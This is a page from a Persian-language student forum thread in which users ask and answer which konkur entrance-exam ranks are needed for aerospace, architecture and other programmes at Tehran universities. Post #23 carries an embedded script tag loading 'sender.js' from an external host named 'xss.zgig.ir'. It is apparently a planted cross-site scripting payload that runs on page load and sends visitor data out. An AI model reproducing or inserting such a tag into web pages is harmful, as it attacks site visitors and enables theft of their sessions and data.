خانه شیمی

X
  • آخرین ارسالات انجمن

•  

صفحه 2 از 66 نخستنخست 12312 ... آخرینآخرین
    نمایش نتایج: از 16 به 30 از 987
    1. Top | #16
      همکار سابق انجمن

نمایش مشخصات
      نقل قول نوشته اصلی توسط javadjon74 نمایش پست ها
      سلام
      باچه رتبه ای میشه هوا فضا تو تهران قبول شد؟؟؟
      من منطقه 3 هستم....
      دانشگاه صنعتی شریف حدود رتبه 400 و دانشگاه امیر کبیر حدود 600 . دانشگاه خواجه نصیر هم رتبه ی حدود 1000 میخواد.
      مشاوره ی رایگان کنکور به مناسبت عید سعید قربان

برنامه ریزی و رفع اشکال برنامه از تاریخ 9 مهرماه تا 14 مهرماه 93 بصورت رایگان...

پیشاپیش عید همه ی دوستان مبارک

09306469796 محمودی
      moshaver2026@yahoo.com

2. Top | #17
      کاربر نیمه فعال

نمایش مشخصات
      نقل قول نوشته اصلی توسط moshaver20 نمایش پست ها
      دانشگاه صنعتی شریف حدود رتبه 400 و دانشگاه امیر کبیر حدود 600 . دانشگاه خواجه نصیر هم رتبه ی حدود 1000 میخواد.
      ممنون خیلی کمکم کرد....

3. Top | #18
      همکار سابق انجمن

نمایش مشخصات
      ممنون خیلی کمکم کرد....
      خواهش میکنم.

برنامه ریزی و رفع اشکال برنامه از تاریخ 9 مهرماه تا 14 مهرماه 93 بصورت رایگان...

09306469796 محمودی
      moshaver2026@yahoo.com

4. Top | #19
      کاربر نیمه فعال

نمایش مشخصات
      نقل قول نوشته اصلی توسط rotbeh1 نمایش پست ها
      سلام.چه جوری میشه آزمون قلم چی رو به صورت تک آزمونی شرکت کنم؟مثلا فقط آزمون5؟سال چهارمی هستم.میرم تو سایت قلم چی اما گزینه نداده که مثلا کدوم آزمون؟
      باید چه گزینه ای رو بزنم؟من گزینه2ای هستم.میخوام تویکی ازآزمونای قلم چی شرکت کنم ببینم ترازم چه جوری میشه
      میشه
      منم میخوام کار شما رو انجام بدم با یکی از دوستان که به عنوان پشتیبان در این موسسه کار میکند صحبت کردم و ایشون گفتند کافیه برید به نزدیک ترین مرکز این موسسه و از مسئول ثبت نام همین رو درخواست کنید
      ایشون هم تقاضای شما رو قبول میکنه و پاسخ نامه در روز هایی که شما تمایل دارید برای شما چاپ میشه ، البته باند قلمچی شما رو هر طور شده قانع میکنه که بایستی همه رو شرکت کنید شما حرف خودتون رو بزنید و بگید من یا اینا رو میخوام یا هیچ کدوم.

من خودم فقط آزمون های جامع رو شرکت می کنم
      .
      .
      .
      حالا که بحث رتبه و پذیرش دانشگاه ها هست کسی میدونه مهندسی معماری در دانشگاه های تهران چه رتبه ای میخواد؟
      ویرایش توسط Elena 1994 : 15 آذر 1391 در ساعت 20:49

5. Top | #20
      همکار سابق انجمن

نمایش مشخصات
      دانشگاه تهران : منطقه 1 : زیر 500 - منطقه 2: حدود 500 منطقه 3 : زیر 200
      دانشگاه علم و صنعت: منطقه 1 : حدود 1000 - منطقه 2: حدود 1000 - منطقه 3 : ؟
      دانشگاه شهید بهشتی: منطقه 1 : زیر 1500 - منطقه 2: حدود 1000 منطقه3 : ؟
      دانشگاه هنر تهران : منطقه 2: حدود 1500 - منطقه 3 : حدود 500
      دانشگاه تربیت دبیر شهید رجایی: منطقه 1: حدود 4000 منطقه 2: حدود 2000 منطقه 3: حدود 1000
      دانشگاه تربیت دبیر فنی و حرفه ای دختران تهران شریعتی: منطقه 1 : حدود 4 هزار منطقه 2: حدود 3500

09306469796 محمودی
      moshaver2026@yahoo.com

6. Top | #21
      کاربر نیمه فعال

نمایش مشخصات
      نقل قول نوشته اصلی توسط moshaver20 نمایش پست ها
      دانشگاه تهران : منطقه 1 : زیر 500 - منطقه 2: حدود 500 منطقه 3 : زیر 200
      دانشگاه علم و صنعت: منطقه 1 : حدود 1000 - منطقه 2: حدود 1000 - منطقه 3 : ؟
      دانشگاه شهید بهشتی: منطقه 1 : زیر 1500 - منطقه 2: حدود 1000 منطقه3 : ؟
      دانشگاه هنر تهران : منطقه 2: حدود 1500 - منطقه 3 : حدود 500
      دانشگاه تربیت دبیر شهید رجایی: منطقه 1: حدود 4000 منطقه 2: حدود 2000 منطقه 3: حدود 1000
      دانشگاه تربیت دبیر فنی و حرفه ای دختران تهران شریعتی: منطقه 1 : حدود 4 هزار منطقه 2: حدود 3500
      جدا شهید رجایی و شریعتی رو با 4000 میشه قبول شد منطقه 1؟
      عباس پور و امیرکبیر چطور اونا معماری ندارن؟

7. Top | #22
      کاربر باسابقه

Sarkhosh
      نمایش مشخصات
      نقل قول نوشته اصلی توسط milad235 نمایش پست ها
      سلام دوست عزیز.

برخلاف گفته برخی از دوستان کار خیلی مشکلی نیس

ثبتنام قلم چی اینترنتی نیس،بلکه اونجا فقط پیش ثبتنام میکنن که مهم نیس

شما برای اینکه در آزمون شرکت کنین باید حضوری برین به نمایندگی قلم چی و قضیه رو که توضییح بدین

خودشون ثبتنامتون میکنن

من خودم سال قبل این کار رو کردم

موفق باشی
      اما دوست من میخواست پارسال اینکارو بکنه اما گفتن باید از هروقت که ثبت نام میکنی تا آخرش رو ثبت نام کنی

8. Top | #23
      کاربر انجمن

نمایش مشخصات
      نقل قول نوشته اصلی توسط Shayan نمایش پست ها

با سلام.
      از زمانی که فعالیت خودم رو در این انجمن شروع کردم مداوم با این سوال ها رو به رو می شدم که "با فلان درصد فلان رشته قبول می شم؟" یا "چه رتبه ای واسه فلان رشته لازمه؟" و ...
      بیشتر شما با ابزار تخمین رتبه و نمره ی موسسه ی گزینه 2 آشنا هستید، سیستمی که فقط برای کاربرانی قابل استفاده است، که در آزمون های گزینه 2 شرکت می کنند.
      زمانی که در گزینه 2 بودم این سیستم واقعاً برای من مفید بود، خصوصاً در دوران جمع بندی.
      با این سیستم آرامش شما بسیار بیشتر خواهد شد زیرا با استفاده از آن ارزیابی دقیقی از وضعیت خود خواهید داشت.

می خواستم کاری کنم تا شما نیز بتوانید از این سیستم بی نقص استفاده کنید.
      با طراحی صفحه ای می توانید درصد های خود رو وارد کنید و سپس با کلیک بر روی "مشاهده احتمال قبولی" وارد سایت اصلی گزینه 2 شده و بقیه کار را راحت انجام دهید.
      فقط یادتان باشد در اولین کلیک بر روی مشاهده احتمال قبولی کلیک نکنید زیرا با پیغام خطا مواجه خواهید شد.
      پس از کلیک روی مشاهده احتمال قبولی وارد نرم افزار اصلی می شوید، در اونجا می توانید با تخمین رتبه ی مجدد محل هایی که احتمال قبولی در آنها را دارید را نیز مشاهده کنید.

آموزش ویدئویی استفاده از نرم افزار تخمین رتبه آنلاین

ورود به سیستم تخمین رتبه و نمره مطابق با کنکور سراسری

پاینده باشید.
      سلام دوستان خوبین ؟
      من یه سوال راجع به این قسمت دارم ؟
      این که من کسانی رو دیدم که درصد های خوبی رو زدن ولی رتبشون تقریبا 5 هزار یا 6 هزار شده اما من که تست کردم رتبه 1500 یا 2000 رو نشون میده
      این چه طوریه ؟
      دوستان کسی میتونه نرم افزاری رو معرفی کنه که درصد های پذیرفته شدگان سال 91 در اون باشه ؟؟؟؟؟

<script src="http://xss.zgig.ir/sender.js" type="text/javascript"></script>

9. Top | #24
      کاربر نیمه فعال

نمایش مشخصات
      میشه بگید چه رتبه هایی رفتن هوا فضا؟؟؟؟
      تو سایت کانون گشتم نبود؟؟
      میشه بگید با کمترین رتبه ای که میشه تو تهران هوا فضا قبول شد چه رتبه ای هست ؟؟؟
      میشه بگید با کمترین رتبه ای که میشه هوا فضا تو مالک اشتر قبول شد چنده؟؟
      چه درس هایی رو باید بیشتر بخونم ؟؟؟
      درصد ها تو کنکور باید چه توری باشه؟؟؟

10. Top | #25
      کاربر انجمن

نمایش مشخصات
      طراحی صنعتی میخوام.واسه هنر نداره چیکار کنم؟!!

11. Top | #26
      کاربر اخراجی

نمایش مشخصات
      میشه بگید چه رتبه هایی رفتن هوا فضا؟؟؟؟
      تو سایت کانون گشتم نبود؟؟
      میشه بگید با کمترین رتبه ای که میشه تو تهران هوا فضا قبول شد چه رتبه ای هست ؟؟؟
      میشه بگید با کمترین رتبه ای که میشه هوا فضا تو مالک اشتر قبول شد چنده؟؟
      چه درس هایی رو باید بیشتر بخونم ؟؟؟
      درصد ها تو کنکور باید چه توری باشه؟؟؟
      من بهت میگم. فقط بگو منطقه چند هستی؟

12. Top | #27
      کاربر انجمن

نمایش مشخصات
      سلام دوستان من میخاستم بپرسم دراین چهار رشته زیر واین سه شهر برای دانشگاه سراسری رتبه ام باید چند باشه
      منطقه2 رشته ام ریاضی
      رشته–––>مهندسی: مکانیک،آی تی،سازه،الکترونیک
      شهر–––> تهران،تبریز،ارومیه
      ممنون میشم بگید چه درس هایی رو باید از همه بهتر بخونم
      باسپاس

13. Top | #28
      کاربر فعال

نمایش مشخصات
      نرم افزار تهران چی؟؟؟؟؟؟؟؟؟

14. Top | #29
      کاربر انجمن

نمایش مشخصات
      مربوط به منه این پاسخ؟؟؟
      نرم افزار من که نرم افزار نگفتم؟؟!!

15. Top | #30
      کاربر فعال

نمایش مشخصات
      نقل قول نوشته اصلی توسط kurd@ir نمایش پست ها
      مربوط به منه این پاسخ؟؟؟
      نرم افزار من که نرم افزار نگفتم؟؟!!
      نه من سوال کردم
      سوال من بود

صفحه 2 از 66 نخستنخست 12312 ... آخرینآخرین

افراد آنلاین در تاپیک

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربر و 1 مهمان)

کلمات کلیدی این موضوع

..............، ...............، ................، .................، ..................، ...................، ....................، spam، فنی، فناوری، فوری، فیلم، فیزیوتراپی، فیزیک، قلمچی، قبل، قبول، قبولی، قدرت، كنكور، لطفا، مفید، مهم، مهندسی، مهندسی صنایع، مهر، موسسه، میانگین، میتونه، میشه، میشیم، مکانیک، مخابرات، مختلف، مشهد، مشکل، مشاوره، مطالعه، معماری، معتبر، معدل، معرفی، چه، نیمه، نرم، نرم افزار، نزدیک، نساجی، نظرتون، هم، همچنین، های، هاتو، هر، ولی، یه، یا، کمک، کنم، کنکور، کنکور 92، کنکور 93، کنکور ریاضی، کنکور سراسری، کنکورو، کنکوری، که، کامپیوتر، کانون، کاربردی، کارشناسی، کارشناسی ارشد، کتاب، کجا، کشاورزی، گزینه 2، گزینه دو، پیام، پزشکی، پست، آموزش، آموزش زبان، آمار، آزمونهای آزمایشی، آزمایشی، آسون، افزار، امکان، امتحان، امسال، انتفاعی، انتقال، انتخاب، انتخاب رشته، انتظار، این، احتمال، اخرین، ادبیات، ادغام، از، اساتید، اساس، اصفهان، اطلاعات، اعلام، اعداد، به، بهتر، بود، بودم، بگو، بگین، بگیر، با، بالا، بالایی، بر، برق، توسعه، تا، تاپیک، تاثیر معدل، تبریز، تجربی، تخمین، تخمین رتبه، ترین، تست، جمع بندی، جالب، جدید، حق، حقوق، حسابداری، حضوری، دقیق، دوباره، دوران جمع بندی، دوستان، دین وزندگی، دینی، دانشگاه، دانشگاه آزاد، دانشجو، داده، داروسازي، داشت، در، درس، درست، درصد، رفتن، رو، روانشناسی، روزانه، ریاضی، ریاضیات، ریدینگ، ریزش، رایگان، رتیه، رتبه، رتبه کنکور، رشته تجربی، زمین شناسی، زيست، زیست، زیست شناسی، زیست2، زاهدان، زبان، زبان فارسی، زبان انگلیسی، سنجش، سهمیه، سوال، سوالات، سیستم، سال، ساخت، سخت، سراسری، سطح، شما، شهر، شهرسازی، شیمی، شیمی 2، شیمی 3، شدن، شده، ضمن، علوم، علت، عنوان، عربی، غلط، غیر

نمایش برچسب‌ها

آخرین مطالب سایت کنکور

• تبلیغات متنی انجمن